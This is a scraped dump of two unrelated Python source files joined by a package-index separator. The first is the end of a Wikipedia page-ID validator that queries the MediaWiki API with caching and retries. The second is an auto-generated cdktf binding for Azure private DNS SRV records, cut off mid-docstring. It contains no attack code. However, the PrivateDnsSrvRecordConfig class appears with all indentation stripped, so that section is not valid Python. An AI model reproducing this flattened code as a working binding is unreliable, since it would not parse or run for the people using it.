        self._p = "wikipedia:"
        self._data = data

    def is_valid(self, wikipedia_id, get_extra_info=False):
        """Check whether *wikipedia_id* is a valid Wikipedia page identifier.

        Results are cached in ``self._data``; the API is only queried on a
        cache miss. When ``get_extra_info`` is True a ``(valid, info_dict)``
        tuple is returned instead of a bare boolean.
        """
        wikipedia_id = self.normalise(wikipedia_id, include_prefix=True)
        if wikipedia_id is None:
            # Identifier could not even be normalised
            return False
        else:
            if wikipedia_id not in self._data or self._data[wikipedia_id] is None:
                # Cache miss: ask the API and remember the outcome
                if get_extra_info:
                    info = self.exists(wikipedia_id, get_extra_info=True)
                    self._data[wikipedia_id] = info[1]
                    return (info[0] and self.syntax_ok(wikipedia_id)), info[1]
                self._data[wikipedia_id] = dict()
                self._data[wikipedia_id]["valid"] = True if (self.exists(wikipedia_id) and self.syntax_ok(
                    wikipedia_id)) else False
                return self._data[wikipedia_id].get("valid")
            # Cache hit
            if get_extra_info:
                return self._data[wikipedia_id].get("valid"), self._data[wikipedia_id]
            return self._data[wikipedia_id].get("valid")

    def normalise(self, id_string, include_prefix=False):
        """Normalise an identifier to its bare numeric page-ID form.

        Strips the ``wikipedia:`` prefix if present, URL-decodes the rest,
        removes every non-digit character, and optionally re-adds the
        prefix. Returns None when the input cannot be processed.
        """
        try:
            if id_string.startswith(self._p):
                wikipedia_string = id_string[len(self._p):]
            else:
                wikipedia_string = id_string
            # Keep digits only (after percent-decoding), dropping NUL bytes
            wikipedia_string = sub("\0+", "", sub("[^0-9]", "", unquote(wikipedia_string)))
            return "%s%s" % (
                self._p if include_prefix else "",
                wikipedia_string.strip(),
            )
        except:
            # Any error in processing the MediaWiki pageID will return None
            return None

    def syntax_ok(self, id_string):
        """Return True if the (prefixed) identifier is a positive integer
        page ID with no leading zero."""
        if not id_string.startswith("wikipedia:"):
            id_string = self._p + id_string
        return True if match("^wikipedia:[1-9][0-9]*$", id_string) else False

    def exists(self, wikipedia_id_full, get_extra_info=False, allow_extra_api=None):
        """Query the MediaWiki API to check that the page ID exists.

        Retries up to 3 times on timeout/connection errors; a page is
        considered existing when the API response carries a 'title' for it.
        Returns a ``(bool, info_dict)`` tuple when ``get_extra_info`` is
        True, a bare bool otherwise. When the API service is disabled or
        the ID cannot be normalised, returns False.
        """
        valid_bool = True
        if self._use_api_service:
            wikipedia_id = self.normalise(wikipedia_id_full)
            if wikipedia_id is not None:
                # Up to 3 attempts against the API
                tentative = 3
                while tentative:
                    tentative -= 1
                    try:
                        query_params = {
                            "action": "query",
                            "pageids" : wikipedia_id,
                            "format": "json",
                            "formatversion": "1", # format of json output (current version 1; might be replaced w/ v.2)
                        }
                        r = get(self._api, params=query_params, headers=self._headers, timeout=30) # check (translated from Italian "controlla")
                        if r.status_code == 200:
                            r.encoding = "utf-8"
                            json_res = loads(r.text)
                            if get_extra_info:
                                extra_info_result = {}
                                try:
                                    # Existing pages expose a 'title' key
                                    result = True if 'title' in json_res['query']['pages'][wikipedia_id].keys() else False
                                    extra_info_result["valid"] = result
                                    return result, extra_info_result
                                except KeyError:
                                    extra_info_result["valid"] = False
                                    return False, extra_info_result
                            try:
                                return True if 'title' in json_res['query']['pages'][wikipedia_id].keys() else False
                            except KeyError:
                                return False
                        elif 400 <= r.status_code < 500:
                            # Client error: the ID is definitively invalid
                            if get_extra_info:
                                return False, {"valid": False}
                            return False
                    except ReadTimeout:
                        # Do nothing, just try again
                        pass
                    except ConnectionError:
                        # Sleep 5 seconds, then try again
                        sleep(5)
                # All retries exhausted without a definitive answer
                valid_bool=False
            else:
                if get_extra_info:
                    return False, {"valid": False}
                return False
        if get_extra_info:
            return valid_bool, {"valid": valid_bool}
        return valid_bool

    def extra_info(self, api_response, choose_api=None, info_dict={}):
        """Return extra metadata for an identifier.

        Currently a stub: only the ``valid`` flag is populated.
        NOTE(review): ``info_dict={}`` is a mutable default argument (the
        parameter is unused here, but worth fixing if it gains a body).
        """
        result = {}
        result["valid"] = True
        # to be implemented
        return result
|
PypiClean
|
/cdktf-cdktf-provider-azurerm-10.0.1.tar.gz/cdktf-cdktf-provider-azurerm-10.0.1/src/cdktf_cdktf_provider_azurerm/private_dns_srv_record/__init__.py
|
import abc
import builtins
import datetime
import enum
import typing
import jsii
import publication
import typing_extensions
from typeguard import check_type
from .._jsii import *
import cdktf as _cdktf_9a9027ec
import constructs as _constructs_77d1e7e8
# NOTE(review): auto-generated jsii binding (cdktf provider-azurerm); any
# manual edit will be lost on regeneration -- change the generator instead.
class PrivateDnsSrvRecord(
    _cdktf_9a9027ec.TerraformResource,
    metaclass=jsii.JSIIMeta,
    jsii_type="@cdktf/provider-azurerm.privateDnsSrvRecord.PrivateDnsSrvRecord",
):
    '''Represents a {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record azurerm_private_dns_srv_record}.'''

    def __init__(
        self,
        scope: _constructs_77d1e7e8.Construct,
        id_: builtins.str,
        *,
        name: builtins.str,
        record: typing.Union[_cdktf_9a9027ec.IResolvable, typing.Sequence[typing.Union["PrivateDnsSrvRecordRecord", typing.Dict[builtins.str, typing.Any]]]],
        resource_group_name: builtins.str,
        ttl: jsii.Number,
        zone_name: builtins.str,
        id: typing.Optional[builtins.str] = None,
        tags: typing.Optional[typing.Mapping[builtins.str, builtins.str]] = None,
        timeouts: typing.Optional[typing.Union["PrivateDnsSrvRecordTimeouts", typing.Dict[builtins.str, typing.Any]]] = None,
        connection: typing.Optional[typing.Union[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.WinrmProvisionerConnection, typing.Dict[builtins.str, typing.Any]]]] = None,
        count: typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]] = None,
        depends_on: typing.Optional[typing.Sequence[_cdktf_9a9027ec.ITerraformDependable]] = None,
        for_each: typing.Optional[_cdktf_9a9027ec.ITerraformIterator] = None,
        lifecycle: typing.Optional[typing.Union[_cdktf_9a9027ec.TerraformResourceLifecycle, typing.Dict[builtins.str, typing.Any]]] = None,
        provider: typing.Optional[_cdktf_9a9027ec.TerraformProvider] = None,
        provisioners: typing.Optional[typing.Sequence[typing.Union[typing.Union[_cdktf_9a9027ec.FileProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.LocalExecProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.RemoteExecProvisioner, typing.Dict[builtins.str, typing.Any]]]]] = None,
    ) -> None:
        '''Create a new {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record azurerm_private_dns_srv_record} Resource.

        :param scope: The scope in which to define this construct.
        :param id_: The scoped construct ID. Must be unique amongst siblings in the same scope
        :param name: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#name PrivateDnsSrvRecord#name}.
        :param record: record block. Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#record PrivateDnsSrvRecord#record}
        :param resource_group_name: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#resource_group_name PrivateDnsSrvRecord#resource_group_name}.
        :param ttl: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#ttl PrivateDnsSrvRecord#ttl}.
        :param zone_name: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#zone_name PrivateDnsSrvRecord#zone_name}.
        :param id: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#id PrivateDnsSrvRecord#id}. Please be aware that the id field is automatically added to all resources in Terraform providers using a Terraform provider SDK version below 2. If you experience problems setting this value it might not be settable. Please take a look at the provider documentation to ensure it should be settable.
        :param tags: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#tags PrivateDnsSrvRecord#tags}.
        :param timeouts: timeouts block. Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#timeouts PrivateDnsSrvRecord#timeouts}
        :param connection: 
        :param count: 
        :param depends_on: 
        :param for_each: 
        :param lifecycle: 
        :param provider: 
        :param provisioners: 
        '''
        # Runtime type-check of the positional args; the _typecheckingstub__
        # helpers are generated at module bottom. Active only under __debug__.
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__9fb1f1e98de1ef34a625d65c8f3eea9644cc513e083b9986d0a77faa13946b81)
            check_type(argname="argument scope", value=scope, expected_type=type_hints["scope"])
            check_type(argname="argument id_", value=id_, expected_type=type_hints["id_"])
        # Bundle every keyword argument into the generated config struct
        config = PrivateDnsSrvRecordConfig(
            name=name,
            record=record,
            resource_group_name=resource_group_name,
            ttl=ttl,
            zone_name=zone_name,
            id=id,
            tags=tags,
            timeouts=timeouts,
            connection=connection,
            count=count,
            depends_on=depends_on,
            for_each=for_each,
            lifecycle=lifecycle,
            provider=provider,
            provisioners=provisioners,
        )
        # Hand construction over to the jsii kernel
        jsii.create(self.__class__, self, [scope, id_, config])

    @jsii.member(jsii_name="putRecord")
    def put_record(
        self,
        value: typing.Union[_cdktf_9a9027ec.IResolvable, typing.Sequence[typing.Union["PrivateDnsSrvRecordRecord", typing.Dict[builtins.str, typing.Any]]]],
    ) -> None:
        '''Set the ``record`` block(s) on the resource.

        :param value: -
        '''
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__3446cdab40dde4b63f2981030819ea9139ec130a78d892342bc655a4b042f787)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        return typing.cast(None, jsii.invoke(self, "putRecord", [value]))

    @jsii.member(jsii_name="putTimeouts")
    def put_timeouts(
        self,
        *,
        create: typing.Optional[builtins.str] = None,
        delete: typing.Optional[builtins.str] = None,
        read: typing.Optional[builtins.str] = None,
        update: typing.Optional[builtins.str] = None,
    ) -> None:
        '''Set the ``timeouts`` block on the resource.

        :param create: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#create PrivateDnsSrvRecord#create}.
        :param delete: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#delete PrivateDnsSrvRecord#delete}.
        :param read: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#read PrivateDnsSrvRecord#read}.
        :param update: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#update PrivateDnsSrvRecord#update}.
        '''
        value = PrivateDnsSrvRecordTimeouts(
            create=create, delete=delete, read=read, update=update
        )
        return typing.cast(None, jsii.invoke(self, "putTimeouts", [value]))

    @jsii.member(jsii_name="resetId")
    def reset_id(self) -> None:
        '''Unset the optional ``id`` attribute.'''
        return typing.cast(None, jsii.invoke(self, "resetId", []))

    @jsii.member(jsii_name="resetTags")
    def reset_tags(self) -> None:
        '''Unset the optional ``tags`` attribute.'''
        return typing.cast(None, jsii.invoke(self, "resetTags", []))

    @jsii.member(jsii_name="resetTimeouts")
    def reset_timeouts(self) -> None:
        '''Unset the optional ``timeouts`` block.'''
        return typing.cast(None, jsii.invoke(self, "resetTimeouts", []))

    @jsii.member(jsii_name="synthesizeAttributes")
    def _synthesize_attributes(self) -> typing.Mapping[builtins.str, typing.Any]:
        # Internal hook used by cdktf during synthesis
        return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "synthesizeAttributes", []))

    @jsii.python.classproperty
    @jsii.member(jsii_name="tfResourceType")
    def TF_RESOURCE_TYPE(cls) -> builtins.str:
        # Terraform resource type string ("azurerm_private_dns_srv_record")
        return typing.cast(builtins.str, jsii.sget(cls, "tfResourceType"))

    # --- read-only computed attributes and *Input accessors (generated) ---

    @builtins.property
    @jsii.member(jsii_name="fqdn")
    def fqdn(self) -> builtins.str:
        return typing.cast(builtins.str, jsii.get(self, "fqdn"))

    @builtins.property
    @jsii.member(jsii_name="record")
    def record(self) -> "PrivateDnsSrvRecordRecordList":
        return typing.cast("PrivateDnsSrvRecordRecordList", jsii.get(self, "record"))

    @builtins.property
    @jsii.member(jsii_name="timeouts")
    def timeouts(self) -> "PrivateDnsSrvRecordTimeoutsOutputReference":
        return typing.cast("PrivateDnsSrvRecordTimeoutsOutputReference", jsii.get(self, "timeouts"))

    @builtins.property
    @jsii.member(jsii_name="idInput")
    def id_input(self) -> typing.Optional[builtins.str]:
        return typing.cast(typing.Optional[builtins.str], jsii.get(self, "idInput"))

    @builtins.property
    @jsii.member(jsii_name="nameInput")
    def name_input(self) -> typing.Optional[builtins.str]:
        return typing.cast(typing.Optional[builtins.str], jsii.get(self, "nameInput"))

    @builtins.property
    @jsii.member(jsii_name="recordInput")
    def record_input(
        self,
    ) -> typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, typing.List["PrivateDnsSrvRecordRecord"]]]:
        return typing.cast(typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, typing.List["PrivateDnsSrvRecordRecord"]]], jsii.get(self, "recordInput"))

    @builtins.property
    @jsii.member(jsii_name="resourceGroupNameInput")
    def resource_group_name_input(self) -> typing.Optional[builtins.str]:
        return typing.cast(typing.Optional[builtins.str], jsii.get(self, "resourceGroupNameInput"))

    @builtins.property
    @jsii.member(jsii_name="tagsInput")
    def tags_input(self) -> typing.Optional[typing.Mapping[builtins.str, builtins.str]]:
        return typing.cast(typing.Optional[typing.Mapping[builtins.str, builtins.str]], jsii.get(self, "tagsInput"))

    @builtins.property
    @jsii.member(jsii_name="timeoutsInput")
    def timeouts_input(
        self,
    ) -> typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, "PrivateDnsSrvRecordTimeouts"]]:
        return typing.cast(typing.Optional[typing.Union[_cdktf_9a9027ec.IResolvable, "PrivateDnsSrvRecordTimeouts"]], jsii.get(self, "timeoutsInput"))

    @builtins.property
    @jsii.member(jsii_name="ttlInput")
    def ttl_input(self) -> typing.Optional[jsii.Number]:
        return typing.cast(typing.Optional[jsii.Number], jsii.get(self, "ttlInput"))

    @builtins.property
    @jsii.member(jsii_name="zoneNameInput")
    def zone_name_input(self) -> typing.Optional[builtins.str]:
        return typing.cast(typing.Optional[builtins.str], jsii.get(self, "zoneNameInput"))

    # --- read/write configuration properties (generated, type-checked) ---

    @builtins.property
    @jsii.member(jsii_name="id")
    def id(self) -> builtins.str:
        return typing.cast(builtins.str, jsii.get(self, "id"))

    @id.setter
    def id(self, value: builtins.str) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__28077eb04d7bb831db97de19877063bc0a999bf6b52e0aee568c8af46a5b07b0)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "id", value)

    @builtins.property
    @jsii.member(jsii_name="name")
    def name(self) -> builtins.str:
        return typing.cast(builtins.str, jsii.get(self, "name"))

    @name.setter
    def name(self, value: builtins.str) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__89537ab7de0e19eeb9b414bb4e7d2653bf427cca6ba3a133ef9dae2b5c515f76)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "name", value)

    @builtins.property
    @jsii.member(jsii_name="resourceGroupName")
    def resource_group_name(self) -> builtins.str:
        return typing.cast(builtins.str, jsii.get(self, "resourceGroupName"))

    @resource_group_name.setter
    def resource_group_name(self, value: builtins.str) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__10431d6b61873cfd9f69121ea484514edfb955d74a54403fd37f6f9c04206925)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "resourceGroupName", value)

    @builtins.property
    @jsii.member(jsii_name="tags")
    def tags(self) -> typing.Mapping[builtins.str, builtins.str]:
        return typing.cast(typing.Mapping[builtins.str, builtins.str], jsii.get(self, "tags"))

    @tags.setter
    def tags(self, value: typing.Mapping[builtins.str, builtins.str]) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__09e59969cdfaeee04bee49b9bac92f2b9312bc265413607b8b3b422291b8bb96)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "tags", value)

    @builtins.property
    @jsii.member(jsii_name="ttl")
    def ttl(self) -> jsii.Number:
        return typing.cast(jsii.Number, jsii.get(self, "ttl"))

    @ttl.setter
    def ttl(self, value: jsii.Number) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__386b88e0b5003615ad7be07742b24369d9154bddd8cab1432bbf663646b16017)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "ttl", value)

    @builtins.property
    @jsii.member(jsii_name="zoneName")
    def zone_name(self) -> builtins.str:
        return typing.cast(builtins.str, jsii.get(self, "zoneName"))

    @zone_name.setter
    def zone_name(self, value: builtins.str) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__f1b8337fbac54d363e17fa332d7e7ce3d53c5de29bd61e998375788cff5645b0)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "zoneName", value)
@jsii.data_type(
jsii_type="@cdktf/provider-azurerm.privateDnsSrvRecord.PrivateDnsSrvRecordConfig",
jsii_struct_bases=[_cdktf_9a9027ec.TerraformMetaArguments],
name_mapping={
"connection": "connection",
"count": "count",
"depends_on": "dependsOn",
"for_each": "forEach",
"lifecycle": "lifecycle",
"provider": "provider",
"provisioners": "provisioners",
"name": "name",
"record": "record",
"resource_group_name": "resourceGroupName",
"ttl": "ttl",
"zone_name": "zoneName",
"id": "id",
"tags": "tags",
"timeouts": "timeouts",
},
)
class PrivateDnsSrvRecordConfig(_cdktf_9a9027ec.TerraformMetaArguments):
def __init__(
self,
*,
connection: typing.Optional[typing.Union[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.WinrmProvisionerConnection, typing.Dict[builtins.str, typing.Any]]]] = None,
count: typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]] = None,
depends_on: typing.Optional[typing.Sequence[_cdktf_9a9027ec.ITerraformDependable]] = None,
for_each: typing.Optional[_cdktf_9a9027ec.ITerraformIterator] = None,
lifecycle: typing.Optional[typing.Union[_cdktf_9a9027ec.TerraformResourceLifecycle, typing.Dict[builtins.str, typing.Any]]] = None,
provider: typing.Optional[_cdktf_9a9027ec.TerraformProvider] = None,
provisioners: typing.Optional[typing.Sequence[typing.Union[typing.Union[_cdktf_9a9027ec.FileProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.LocalExecProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.RemoteExecProvisioner, typing.Dict[builtins.str, typing.Any]]]]] = None,
name: builtins.str,
record: typing.Union[_cdktf_9a9027ec.IResolvable, typing.Sequence[typing.Union["PrivateDnsSrvRecordRecord", typing.Dict[builtins.str, typing.Any]]]],
resource_group_name: builtins.str,
ttl: jsii.Number,
zone_name: builtins.str,
id: typing.Optional[builtins.str] = None,
tags: typing.Optional[typing.Mapping[builtins.str, builtins.str]] = None,
timeouts: typing.Optional[typing.Union["PrivateDnsSrvRecordTimeouts", typing.Dict[builtins.str, typing.Any]]] = None,
) -> None:
'''
:param connection:
:param count:
:param depends_on:
:param for_each:
:param lifecycle:
:param provider:
:param provisioners:
:param name: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#name PrivateDnsSrvRecord#name}.
:param record: record block. Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#record PrivateDnsSrvRecord#record}
:param resource_group_name: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#resource_group_name PrivateDnsSrvRecord#resource_group_name}.
:param ttl: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#ttl PrivateDnsSrvRecord#ttl}.
:param zone_name: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#zone_name PrivateDnsSrvRecord#zone_name}.
:param id: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#id PrivateDnsSrvRecord#id}. Please be aware that the id field is automatically added to all resources in Terraform providers using a Terraform provider SDK version below 2. If you experience problems setting this value it might not be settable. Please take a look at the provider documentation to ensure it should be settable.
:param tags: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#tags PrivateDnsSrvRecord#tags}.
:param timeouts: timeouts block. Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#timeouts PrivateDnsSrvRecord#timeouts}
'''
if isinstance(lifecycle, dict):
lifecycle = _cdktf_9a9027ec.TerraformResourceLifecycle(**lifecycle)
if isinstance(timeouts, dict):
timeouts = PrivateDnsSrvRecordTimeouts(**timeouts)
if __debug__:
type_hints = typing.get_type_hints(_typecheckingstub__37d28774e61198a32450196eeddf0acf6401d5b3aa85494d27b805561522c56c)
check_type(argname="argument connection", value=connection, expected_type=type_hints["connection"])
check_type(argname="argument count", value=count, expected_type=type_hints["count"])
check_type(argname="argument depends_on", value=depends_on, expected_type=type_hints["depends_on"])
check_type(argname="argument for_each", value=for_each, expected_type=type_hints["for_each"])
check_type(argname="argument lifecycle", value=lifecycle, expected_type=type_hints["lifecycle"])
check_type(argname="argument provider", value=provider, expected_type=type_hints["provider"])
check_type(argname="argument provisioners", value=provisioners, expected_type=type_hints["provisioners"])
check_type(argname="argument name", value=name, expected_type=type_hints["name"])
check_type(argname="argument record", value=record, expected_type=type_hints["record"])
check_type(argname="argument resource_group_name", value=resource_group_name, expected_type=type_hints["resource_group_name"])
check_type(argname="argument ttl", value=ttl, expected_type=type_hints["ttl"])
check_type(argname="argument zone_name", value=zone_name, expected_type=type_hints["zone_name"])
check_type(argname="argument id", value=id, expected_type=type_hints["id"])
check_type(argname="argument tags", value=tags, expected_type=type_hints["tags"])
check_type(argname="argument timeouts", value=timeouts, expected_type=type_hints["timeouts"])
self._values: typing.Dict[builtins.str, typing.Any] = {
"name": name,
"record": record,
"resource_group_name": resource_group_name,
"ttl": ttl,
"zone_name": zone_name,
}
if connection is not None:
self._values["connection"] = connection
if count is not None:
self._values["count"] = count
if depends_on is not None:
self._values["depends_on"] = depends_on
if for_each is not None:
self._values["for_each"] = for_each
if lifecycle is not None:
self._values["lifecycle"] = lifecycle
if provider is not None:
self._values["provider"] = provider
if provisioners is not None:
self._values["provisioners"] = provisioners
if id is not None:
self._values["id"] = id
if tags is not None:
self._values["tags"] = tags
if timeouts is not None:
self._values["timeouts"] = timeouts
@builtins.property
def connection(
self,
) -> typing.Optional[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, _cdktf_9a9027ec.WinrmProvisionerConnection]]:
'''
:stability: experimental
'''
result = self._values.get("connection")
return typing.cast(typing.Optional[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, _cdktf_9a9027ec.WinrmProvisionerConnection]], result)
@builtins.property
def count(
self,
) -> typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]]:
'''
:stability: experimental
'''
result = self._values.get("count")
return typing.cast(typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]], result)
@builtins.property
def depends_on(
self,
) -> typing.Optional[typing.List[_cdktf_9a9027ec.ITerraformDependable]]:
'''
:stability: experimental
'''
result = self._values.get("depends_on")
return typing.cast(typing.Optional[typing.List[_cdktf_9a9027ec.ITerraformDependable]], result)
@builtins.property
def for_each(self) -> typing.Optional[_cdktf_9a9027ec.ITerraformIterator]:
'''
:stability: experimental
'''
result = self._values.get("for_each")
return typing.cast(typing.Optional[_cdktf_9a9027ec.ITerraformIterator], result)
@builtins.property
def lifecycle(self) -> typing.Optional[_cdktf_9a9027ec.TerraformResourceLifecycle]:
'''
:stability: experimental
'''
result = self._values.get("lifecycle")
return typing.cast(typing.Optional[_cdktf_9a9027ec.TerraformResourceLifecycle], result)
@builtins.property
def provider(self) -> typing.Optional[_cdktf_9a9027ec.TerraformProvider]:
'''
:stability: experimental
'''
result = self._values.get("provider")
return typing.cast(typing.Optional[_cdktf_9a9027ec.TerraformProvider], result)
@builtins.property
def provisioners(
self,
) -> typing.Optional[typing.List[typing.Union[_cdktf_9a9027ec.FileProvisioner, _cdktf_9a9027ec.LocalExecProvisioner, _cdktf_9a9027ec.RemoteExecProvisioner]]]:
'''
:stability: experimental
'''
result = self._values.get("provisioners")
return typing.cast(typing.Optional[typing.List[typing.Union[_cdktf_9a9027ec.FileProvisioner, _cdktf_9a9027ec.LocalExecProvisioner, _cdktf_9a9027ec.RemoteExecProvisioner]]], result)
@builtins.property
def name(self) -> builtins.str:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#name PrivateDnsSrvRecord#name}.'''
result = self._values.get("name")
assert result is not None, "Required property 'name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def record(
self,
) -> typing.Union[_cdktf_9a9027ec.IResolvable, typing.List["PrivateDnsSrvRecordRecord"]]:
'''record block.
Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#record PrivateDnsSrvRecord#record}
'''
result = self._values.get("record")
assert result is not None, "Required property 'record' is missing"
return typing.cast(typing.Union[_cdktf_9a9027ec.IResolvable, typing.List["PrivateDnsSrvRecordRecord"]], result)
@builtins.property
def resource_group_name(self) -> builtins.str:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#resource_group_name PrivateDnsSrvRecord#resource_group_name}.'''
result = self._values.get("resource_group_name")
assert result is not None, "Required property 'resource_group_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def ttl(self) -> jsii.Number:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#ttl PrivateDnsSrvRecord#ttl}.'''
result = self._values.get("ttl")
assert result is not None, "Required property 'ttl' is missing"
return typing.cast(jsii.Number, result)
@builtins.property
def zone_name(self) -> builtins.str:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#zone_name PrivateDnsSrvRecord#zone_name}.'''
result = self._values.get("zone_name")
assert result is not None, "Required property 'zone_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def id(self) -> typing.Optional[builtins.str]:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#id PrivateDnsSrvRecord#id}.
Please be aware that the id field is automatically added to all resources in Terraform providers using a Terraform provider SDK version below 2.
If you experience problems setting this value it might not be settable. Please take a look at the provider documentation to ensure it should be settable.
'''
result = self._values.get("id")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def tags(self) -> typing.Optional[typing.Mapping[builtins.str, builtins.str]]:
'''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#tags PrivateDnsSrvRecord#tags}.'''
result = self._values.get("tags")
return typing.cast(typing.Optional[typing.Mapping[builtins.str, builtins.str]], result)
@builtins.property
def timeouts(self) -> typing.Optional["PrivateDnsSrvRecordTimeouts"]:
'''timeouts block.
Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#timeouts PrivateDnsSrvRecord#timeouts}
'''
result = self._values.get("timeouts")
return typing.cast(typing.Optional["PrivateDnsSrvRecordTimeouts"], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "PrivateDnsSrvRecordConfig(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
    jsii_type="@cdktf/provider-azurerm.privateDnsSrvRecord.PrivateDnsSrvRecordRecord",
    jsii_struct_bases=[],
    name_mapping={
        "port": "port",
        "priority": "priority",
        "target": "target",
        "weight": "weight",
    },
)
class PrivateDnsSrvRecordRecord:
    '''A single SRV ``record`` entry: port, priority, target and weight.'''

    def __init__(
        self,
        *,
        port: jsii.Number,
        priority: jsii.Number,
        target: builtins.str,
        weight: jsii.Number,
    ) -> None:
        '''
        :param port: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#port PrivateDnsSrvRecord#port}.
        :param priority: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/azurerm/3.71.0/docs/resources/private_dns_srv_record#priority PrivateDnsSrvRecord#priority}.
